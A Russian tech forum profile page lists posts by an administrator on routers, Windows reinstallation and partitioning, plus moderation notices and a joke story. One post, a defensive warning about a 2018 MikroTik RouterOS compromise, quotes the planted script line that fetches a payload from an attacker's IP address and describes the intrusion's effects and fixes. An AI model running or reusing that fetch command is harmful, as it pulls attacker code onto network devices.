Jump to content
СофтФорум - всё о компьютерах и не только

Loader

Administrators
  • Content Count

    4037
  • Joined

  • Last visited

  • Days Won

    59

Everything posted by Loader

  1. Сервис сугубо коммерческий. Публикацию могу оставить если будет ссылка на софтфорум на вашем сайте в качестве темы поддержки вашего продукта. Если в течение недели не последует ответа - тема будет удалена.
  2. На 952 ставишь компонент NTP Server (в дополнительных пакетах к прошивке находится) Настраиваешь его (инструкций в сети тоже вагон) Затем указываешь в настройках 941 ip 952 в качестве NTP сервера.
  3. Действительно зачем слушать ответы на свои вопросы... Можно было бы удалить пользовательские данные и система сама бы переустановилась. Но это не наш метод. Остаётся длинный путь - переустановка системы с форматированием жесткого диска...
  4. Каким образом переустанавливал?
  5. 1. Если не планируешь использовать win 7 - папку old можешь удалить 2. В настройках можно найти пункт типа восстановить исходное состояние windows (удалить все данные и переустановить систему). Т.Е. повторно устанавливать систему с диска не требуется
  6. apc back-Ups Pro от 2000 По поводу ПО на линукс не в курсе
  7. 23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
  8. Самое интересное что на многих ресиверах вещание недельки через две возобновляется, но он уже обменян на новый...
  9. Rambler Собственно из-за таких сообщений в своё время и был закрыт раздел "Страна", т.к. после начинался переход на личности. После приходилось растаскивать народ по углам с применением санкций. Считайте это последним предупреждением и запретом поднятия темы Украины на данном форуме. Многие уважаемые люди форума оттуда родом, не думаю что кому-то нравится слышать плохое о своей родине. Модераторам даю право на любые санкции.
  10. Меняй режим тп-линка на точку доступа и пробуй после этого делать его репитером. Ищи в тп-линке фаервол.
  11. И это говорит человек с регистрацией меньше месяца назад и нулём полезных публикаций в профиле? Предупреждение W За неуважительное отношение к участникам форума наказан.
  12. О проблеме известно, планируем до конца недели устранить
  13. что-то не так с микротиком. В нём сохраняются все настройки в реальном времени и после возобновления питания восстанавливаются.
  14. Штатные телепаты в отпуске, вы уж простите. Где Вы нашли страницу "редактирование"?
  15. Ситуация известна, скоро перенастроят сервер и всё будет впорядке.
  16. По поводу разбивки на разделы - мне вообще непонятен принцип разбивки жесткого диска на кучу разделов (если используется одна операционная система). Раздел под данные должен быть один ИМХО. По молодости игрался кучей разделов, но понял несостоятельности подобного решения, поскольку в самое подходящее время заканчивается свободное место на одном из разделов.
  17. До этого средства восстановления ещё нужно добраться. Отдельный раздел повышает эту вероятность т.к. он можно сказать изолирован от работающей операционной системы и таким образом защищен от сбоев на системном разделе.
  18. Это загрузочный раздел. Плюсы: 1. Может загружать как Windows так и Linux системы через этот раздел. 2. В зависимости от конфигурации в нём или ещё в одном разделе (на 450 Мб) хранятся утилиты для восстановления системы. 3. Необходим при использовании UEFI-загрузки и при использовании GPT вместо MBR на жестком диске (поддерживает диски большого объема, таблица разделов хранится в двух местах, что повышает устойчивость к сбоям).
  19. Да, только одну панель делать у одного края, а другую у другого края экрана.
  20. Loader

    Гадалка

    Краснодарский край, 1964 год. Глухая станица Тихорецкого района. Вокруг поля да степи… К хате на окраине станицы подъезжает трактор. Из него выходят мужик и беременная баба. Они заходят в дом бабки-повитухи и гадалки по-совместительству. В хате низкие потолки с балками, света нет, только керосинка коптит на столе. Мужик(М): - Петровна, мы вот тебе принесли…харчей немного, ну там яичек, да сальца..И вот ещё,- достает из-за запазухи пол-литровую бутылку. Бабка -гадалка(Г) – Спирт? М:- Спирт, спирт… Баба (Б):-Петровна, ну не томи, давай уже…кто родится то? Гадалка начинает кряхтеть, встаёт со скрипом с табурета и идёт к буфету, достаёт карты, свечку и какую-то иконку. Затем возвращается на табурет, зажигает свечку и начинает что-то бурчать под-нос, раскладывая карты. Так проходит минут пятнадцать. М:- Ну, что Петровна? Кто? Г: Сын родится! М: Фух, ну хоть третий наследником будет! Спасибо Петровна! Б: А кем будет то? Г: Щас, не мельтеши.. Проводит ещё несколько телодвижений.. Г: Что за чёрт? Погодьте… М: Что не так то? Гадалка ещё раз раскладывает карты…Потом торжественно объявляет: - Сосадмином будет! М: Кем? Кем? – мужик подскакивает ближе. Г:-Сосадмином…Так карты говорят! М: Не, Петровна, давай ещё…Ты наверно напутала что-то! Г: Да я два раза проверяла! Точно говорю! Б: Может перегадаешь? Пусть слесарем или шофёром, ну милиционером в крайнем случае…Но не ентим…сос..одмин…ом? Г: Хороший сосадмин будет, точно говорю, на Линуксах будет баянить! Чё перегадывать то! Мужик скрипя зубами встает, охает и направляется к выходу. Баба пуская слезу и держа живот плетётся за ним. Гадалка им в догонку: Да не переживайте! Хороший сосадмин будет! Я ни разу не ошиблась!... Занавес! И действительно, хороший был человек...
×
×
  • Create New...